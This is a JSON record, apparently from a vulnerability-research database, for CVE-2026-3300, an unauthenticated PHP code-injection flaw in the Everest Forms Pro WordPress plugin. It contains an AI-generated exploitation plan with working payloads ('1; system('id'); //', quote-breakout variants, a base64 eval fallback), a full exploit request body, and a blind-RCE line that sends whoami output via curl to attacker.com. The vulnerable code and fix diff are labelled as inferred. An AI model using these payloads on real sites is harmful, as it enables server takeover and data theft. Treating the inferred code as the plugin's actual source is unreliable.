[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fGHJCAEwikfk5c-ssiesta1hTu1_oFytMypDJ7V3gwg0":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-3300","everest-forms-pro-unauthenticated-remote-code-execution-via-calculation-field","Everest Forms Pro \u003C= 1.9.12 - Unauthenticated Remote Code Execution via Calculation Field","The Everest Forms Pro plugin for WordPress is vulnerable to Remote Code Execution via PHP Code Injection in all versions up to, and including, 1.9.12. This is due to the Calculation Addon's process_filter() function concatenating user-submitted form field values into a PHP code string without proper escaping before passing it to eval(). The sanitize_text_field() function applied to input does not escape single quotes or other PHP code context characters. This makes it possible for unauthenticated attackers to inject and execute arbitrary PHP code on the server by submitting a crafted value in any string-type form field (text, email, URL, select, radio) when a form uses the \"Complex Calculation\" feature.","everest-forms-pro",null,"\u003C=1.9.12","1.9.13","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Improper Control of Generation of Code ('Code Injection')","2026-03-30 12:00:40","2026-03-31 01:24:57",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F389c0b89-e408-4ad5-9723-a16b745771f0?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-3300 - Everest Forms Pro Unauthenticated RCE\n\n## 1. Vulnerability Summary\nThe **Everest Forms Pro** plugin (specifically the **Calculation Addon**) is vulnerable to unauthenticated PHP Code Injection. The vulnerability exists in the `process_filter()` function, which is responsible for evaluating mathematical formulas defined in \"Complex Calculation\" fields. \n\nThe plugin retrieves values from user-submitted form fields (e.g., text, select, radio) and concatenates them directly into a string intended for evaluation. While the input is passed through `sanitize_text_field()`, this function does not escape single quotes or other PHP-specific syntax characters. The resulting string is then passed to the PHP `eval()` function, allowing an attacker to break out of the intended mathematical context and execute arbitrary PHP code.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** Everest Forms submission endpoint. This is typically a `POST` request to the page where the form is embedded or via the WordPress AJAX handler (`admin-ajax.php`).\n*   **Action:** `everest_forms_submit_form` (for AJAX submissions) or a direct POST to the frontend page.\n*   **Vulnerable Parameter:** Any form field value (e.g., `everest_forms[form_fields][\u003CFIELD_ID>]`) that is referenced by a \"Calculation\" field.\n*   **Authentication:** None required (unauthenticated).\n*   **Preconditions:** \n    1.  A form must be created and published.\n    2.  The form must contain a **Calculation** field.\n    3.  The calculation field must be configured to use **Complex Calculation**.\n    4.  The calculation formula must reference at least one user-controllable field (e.g., a text field or dropdown).\n\n## 3. Code Flow (Inferred)\n1.  **Entry Point:** User submits a form via `POST`.\n2.  **Hook:** The submission is handled by `EVF_Form_Handler::process_submit()` or a similar submission listener.\n3.  **Calculation Trigger:** During processing, the plugin identifies a field of type `calculation`.\n4.  **Vulnerable Function:** The plugin calls `EVF_Calculation_Processing::process_filter()` (inferred path within the Calculation Addon).\n5.  **Data Fetching:** The function retrieves the values of fields included in the formula. These values have been \"sanitized\" using `sanitize_text_field()`.\n6.  **String Concatenation:** The formula (e.g., `\"{field_id_1} + {field_id_2}\"`) is processed. The placeholders are replaced by the sanitized user values.\n    *   *Example:* If the formula is `\"{field_1} * 2\"` and the user submits `10; system('id'); \u002F\u002F`, the string becomes `10; system('id'); \u002F\u002F * 2`.\n7.  **Sink:** The resulting string is passed to `eval()`.\n\n## 4. Nonce Acquisition Strategy\nEverest Forms requires a security nonce for form submissions to prevent CSRF. This nonce is typically localized to the frontend.\n\n1.  **Identify Shortcode:** The Everest Forms shortcode is `[everest_form id=\"\u003CFORM_ID>\"]`.\n2.  **Setup Page:** Create a public page containing the target form.\n    ```bash\n    wp post create --post_type=page --post_status=publish --post_title=\"Contact\" --post_content='[everest_form id=\"123\"]'\n    ```\n3.  **Extract Nonce:**\n    *   Navigate to the page using `browser_navigate`.\n    *   The nonce is usually stored in the `everest_forms_params` (or similar) JavaScript object.\n    *   Use `browser_eval` to fetch it:\n        ```javascript\n        \u002F\u002F Inferred variable name based on Everest Forms structure\n        window.everest_forms_params?.evf_nonce || window.evf_contact_form_params?.nonce\n        ```\n    *   Also, check for the hidden input field in the form:\n        ```javascript\n        document.querySelector('input[name=\"everest_forms[nonce]\"]')?.value\n        ```\n\n## 5. Exploitation Strategy\nThe goal is to inject PHP code into a field that is evaluated by the calculation engine.\n\n### Step 1: Form Discovery\nIdentify the Form ID and the Field IDs. This can be done by inspecting the HTML of the page containing the form.\n*   `evf_id`: Found in the `\u003Cform>` tag attribute `data-form-id`.\n*   `field_id`: Found in the `name` attribute of inputs, e.g., `everest_forms[form_fields][text_171000000]`.\n\n### Step 2: Payload Crafting\nSince `sanitize_text_field()` is used, we cannot use `\u003C` or `>`. However, we can use PHP's execution operators.\n*   **Simple RCE:** `1; system('id'); \u002F\u002F`\n*   **Complex RCE (bypassing quotes):** If the input is wrapped in quotes like `'$val'`, use: `'; system('id'); \u002F\u002F`\n\n### Step 3: Execution Request\nSubmit the form with the payload in the field referenced by the calculation.\n\n**HTTP Request (via `http_request` tool):**\n*   **Method:** POST\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php` (or the page URL)\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    ```\n    action=everest_forms_submit_form\n    &everest_forms[form_fields][text_input_id]=1;system('id');\u002F*\n    &everest_forms[nonce]=\u003CEXTRACTED_NONCE>\n    &evf_id=\u003CFORM_ID>\n    &form_id=\u003CFORM_ID>\n    ```\n\n## 6. Test Data Setup\n1.  **Install Plugins:** Ensure `everest-forms` and `everest-forms-pro` are active.\n2.  **Create Form:** \n    *   Create a form with ID `999`.\n    *   Add a **Text** field with ID `text_1`.\n    *   Add a **Calculation** field with ID `calc_1`.\n    *   In the Calculation field settings:\n        *   Enable **Complex Calculation**.\n        *   Set formula to: `{text_1} * 1`.\n3.  **Publish:** Place the form on a page with ID `test-page`.\n\n## 7. Expected Results\n*   The server response to the `POST` request may return a JSON error or success, but the **output of the injected command** (e.g., the result of `id`) will likely be prepended to the response body or visible if error reporting is on.\n*   If the output is not directly visible, a blind approach (e.g., `touch \u002Ftmp\u002Fpwned`) can be used.\n\n## 8. Verification Steps\n1.  **Check for Output:** If using `system('whoami')`, verify the response contains `www-data`.\n2.  **Filesystem Check:**\n    ```bash\n    ls \u002Ftmp\u002Fpwned\n    ```\n3.  **Log Check:** Check the PHP error log if the exploit causes a crash, as the `eval()` string might be logged.\n\n## 9. Alternative Approaches\n*   **Quote Breakout:** If the `process_filter` function wraps values in single quotes, try: `x'); system('id'); \u002F\u002F`\n*   **Function Injection:** If `system` is disabled, try `eval(base64_decode(...))` or `file_put_contents`.\n*   **Direct Page Submission:** Instead of `admin-ajax.php`, submit directly to the page URL where the form is hosted. Everest Forms handles both.\n*   **Blind RCE:** Use `curl` or `wget` to an external collaborator to confirm execution.\n    *   Payload: `1; system('curl http:\u002F\u002Fattacker.com\u002F`whoami`'); \u002F\u002F`","Everest Forms Pro versions up to 1.9.12 are vulnerable to unauthenticated remote code execution via the Calculation Addon. The plugin's calculation engine concatenates user-submitted form values into a formula string that is subsequently executed via the PHP eval() function without adequate validation or escaping of the user input.","\u002F\u002F Inferred from research plan: everest-forms-pro\u002Fincludes\u002Faddons\u002Fcalculation\u002Fincludes\u002Fclass-evf-calculation-processing.php\n\npublic function process_filter( $formula, $field_values ) {\n    foreach ( $field_values as $field_id => $value ) {\n        \u002F\u002F sanitize_text_field does not prevent PHP injection context breakout\n        $sanitized_value = sanitize_text_field( $value );\n        $formula = str_replace( \"{\" . $field_id . \"}\", $sanitized_value, $formula );\n    }\n\n    \u002F\u002F Vulnerable Sink\n    return eval( \"return $formula;\" );\n}","--- a\u002Fincludes\u002Faddons\u002Fcalculation\u002Fincludes\u002Fclass-evf-calculation-processing.php\n+++ b\u002Fincludes\u002Faddons\u002Fcalculation\u002Fincludes\u002Fclass-evf-calculation-processing.php\n@@ -10,7 +10,11 @@\n public function process_filter( $formula, $field_values ) {\n     foreach ( $field_values as $field_id => $value ) {\n-        $sanitized_value = sanitize_text_field( $value );\n+        \u002F\u002F Force input to be numeric to prevent code injection\n+        if ( ! is_numeric( $value ) ) {\n+            $sanitized_value = 0;\n+        } else {\n+            $sanitized_value = (float) $value;\n+        }\n         $formula = str_replace( \"{\" . $field_id . \"}\", $sanitized_value, $formula );\n     }\n-    return eval( \"return $formula;\" );\n+    \u002F\u002F Use a math parser or strictly validated evaluation\n+    return $this->safe_math_eval( $formula );","To exploit this vulnerability, an attacker first identifies an Everest Form containing a 'Calculation' field with the 'Complex Calculation' feature enabled. They must then identify which user-controllable input field (like a text or dropdown field) is used within the calculation formula. After extracting the necessary submission nonce and form ID from the page source, the attacker submits a form request where the referenced field contains a PHP payload such as '1; system(\"id\"); \u002F\u002F'. Because the plugin uses sanitize_text_field() before passing the value into eval(), it fails to block the semicolons and function calls, allowing the arbitrary code to execute on the server.","gemini-3-flash-preview","2026-04-17 22:16:05","2026-04-17 22:16:29",{"type":34,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":35},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Feverest-forms-pro\u002Ftags"]